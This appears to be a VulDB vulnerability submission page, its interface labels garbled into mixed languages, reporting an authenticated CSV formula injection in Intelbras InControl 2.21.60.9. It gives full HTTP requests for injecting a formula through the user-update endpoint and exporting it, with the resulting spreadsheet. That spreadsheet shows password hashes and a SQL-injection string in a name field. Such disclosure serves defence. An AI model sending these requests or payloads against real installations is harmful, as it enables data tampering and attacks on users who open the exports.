Súbít #600881: Intelbras InControl 2.21.60.9 CSV Injectionbayani

KuraIntelbras InControl 2.21.60.9 CSV Injection
GaskiyaThere is an authenticated CSV Injection (also known as Formula Injection) vulnerability in the InControl software. The application doesn't sanitize user input in the /v1/operador/<id> endpoint. This endpoint is used to update user information, such as username, password etc. After updating a user, we can use the export users functionality which can be requested in this endpoint: /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador This is the request that updates a user, note that we've injected the formula "=10*10" in the "nome_completo" parameter, and this will be processed and we will get "100" in the output. PUT /v1/operador/3 HTTP/1.1 Host: localhost:4441 Content-Length: 849 Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9. Accept-Language: pt-BR,pt;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: application/json, text/plain, */* Content-Type: application/json Origin: https://localhost:4445 Referer: https://localhost:4445/ Accept-Encoding: gzip, deflate, br Connection: keep-alive {"id":3,"pessoa":{"id":5,"nome_completo":"=10*10","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesara","password":"pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag=","groups":{"id":4,"name":"Visitante","permissions":[{"id":133,"codename":"add_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":134,"codename":"change_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":135,"codename":"delete_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":136,"codename":"view_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}}]},"is_active":true,"is_superuser":true}} ------------------------------------------------------------------- Here we have the download request GET /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador HTTP/1.1 Host: localhost:4441 Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9. Accept-Language: pt-BR,pt;q=0.9 Accept: application/json, text/plain, */* Origin: https://localhost:4445 Referer: https://localhost:4445/ Accept-Encoding: gzip, deflate, br Connection: keep-alive ---------------------------------------------------------------- After opening the CSV in Excel we have the following values nome_completo email telefone_celular imagem username password group is_active is_superuser pentester [email protected] pentester pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= Administrador True True 100 [email protected] cesara pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= Visitante True True ' OR '1'='1'-- [email protected] admin2 pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E= Administrador True False Admin admin pbkdf2_sha256$150000$J0ZQzdvJeF1v$8aOKW77aCwYEEIh/o0zW5oWhOVAnNiKOnvwaPGMFjqw= Administrador True True
Manga⚠️ https://localhost:4441/v1/operador/<id>
Màdùmga
 lorenzomoulin (UID 33175)
Furta06/20/2025 00:18 (8 Wurɗi 전)
Gargajiya07/04/2025 08:01 (14 days later)
HalittaShingilam
VulDB gite314836 [Intelbras InControl har 2.21.60.9 /v1/operador/ kura hakki ndiyam]
Nganji20

Interested in the pricing of exploits?

See the underground prices here!